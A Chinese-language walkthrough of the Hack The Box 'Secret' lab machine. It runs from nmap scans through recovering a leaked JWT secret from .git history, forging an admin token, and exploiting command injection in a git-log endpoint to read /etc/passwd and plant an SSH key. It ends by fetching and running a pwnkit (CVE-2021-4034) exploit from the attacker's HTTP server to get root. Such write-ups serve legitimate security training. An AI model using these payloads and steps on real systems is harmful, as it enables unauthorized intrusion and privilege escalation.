ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

[Hack The Box] HTB—Secret walkthrough

2022-02-25 09:05:54  阅读:996  来源: 互联网

标签:Box http name 11.120 walkthrough Secret ssh file 10.10


[Hack The Box] HTB—Secret walkthrough

machine :Hack The Box—Secret

image-20220224094751851

HTB—Secret


一、信息搜集

nmap

nmap -sV 10.10.11.120

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

深度扫描开放端口

nmap -sC -sV -n -T5 -p 22,80,3000 10.10.11.120

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
|   256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_  256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

二、网站渗透

照着文档写得,curl注册

image-20220224102333723

curl -i -X POST \
  -H 'Content-Type: application/json' \
  -d '{"name":"xiaozz", "email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
  http://10.10.11.120:3000/api/user/register

image-20220224102504284

登陆

image-20220224102611796

curl -i -X POST \
  -H 'Content-Type: application/json' \
  -d '{"email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
  http://10.10.11.120:3000/api/user/login

image-20220224102740419

auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoieGlhb3p6IiwiZW1haWwiOiJ4aWFvekBkYXNpdGgud29ya3MiLCJpYXQiOjE2NDU2Njk2NDZ9.dQlJD5uraui5jzOJRvqdJ_5c4PARMhbYbMW-pAz4Ixs

认证image-20220224103049265


1.jwt伪造

我们需要admin权限,尝试jwt绕过 jwt.io

image-20220224105308974

翻到密钥在.env中

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret

image-20220224105342816

TOKEN_SECRET = secret不对,发现有git泄露,尝试用.git恢复,这里我找到一个方便的工具:gakki429/Git_Extract: 提取远程 git 泄露或本地 git 的工具 (github.com)

python2 git_extract.py ../.git

image-20220224105451809

找到真正的TOKEN_SECRET

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE

image-20220224105521505

连系代码local-web\routes\private.js

router.get('/logs', verifytoken, (req, res) => {
    const file = req.query.file;
    const userinfo = { name: req.user }
    const name = userinfo.name.name;
    
    if (name == 'theadmin'){
        const getLogs = `git log --oneline ${file}`;
        exec(getLogs, (err , output) =>{
            if(err){
                res.status(500).send(err);
                return
            }
            res.json(output);
        })
    }
    else{
        res.json({
            role: {
                role: "you are normal user",
                desc: userinfo.name.name
            }
        })
    }
})

name == 'theadmin'修改jwt

image-20220224105842338

admin的jwt

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4

成功登陆admin,登陆后看http://10.10.11.120:3000/api/logs


2.命令执行

const getLogs = git log --oneline ${file}; private.js这段代码会有一个命令执行

http://10.10.11.120:3000/api/logs?file=123;whoami;

image-20220224110137099

反弹shell失败,看别人wp是写入ssh公钥(因为看etc/passwd,我们现在这个用户是有登陆权限的)

curl -i \
  -H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
  'http://10.10.11.120/api/logs?file=index.js;id;cat+/etc/passwd' | sed 's/\\n/\n/g'

利用sed 's/\\n/\n/g'换行输出

image-20220224112730213


3.写入ssh公钥

kali攻击机上:

ssh-keygen -t rsa //在攻击机上生成ssh公钥和私钥,密码设置为空
cd /root/.ssh
export PUBLIC_KEY=$(cat id_rsa.pub)   //将公钥的内容存储到 bash 变量中

然后执行命令

mkdir -p /home/dasith/.ssh
echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys

image-20220224113850317

curl

curl -i \ //-i 显示返回的headers
  -H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
  -G \  //以get传数据file
  --data-urlencode "file=123;mkdir -p /home/dasith/.ssh;echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys"\   //url编码
  'http://10.10.11.120/api/logs'

image-20220224113901867

ssh登陆

ssh dasith@10.10.11.120

image-20220224114115169

得到user flag


三、提权

老样子linpeas.sh

image-20220224115404724

有pkexec提权的CVE-2021-4034

开个http server

python3 -m http.server 8080

传文件过去

wget http://10.10.14.25:8080/Makefile
wget http://10.10.14.25:8080/cve-2021-4034.c
wget http://10.10.14.25:8080/pwnkit.c
make
./cve-2021-4034

image-20220224123241889

得到root flag

在这里插入图片描述


参考wp:

https://drt.sh/posts/htb-secret/

标签:Box,http,name,11.120,walkthrough,Secret,ssh,file,10.10
来源: https://blog.csdn.net/weixin_46081055/article/details/123115290

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有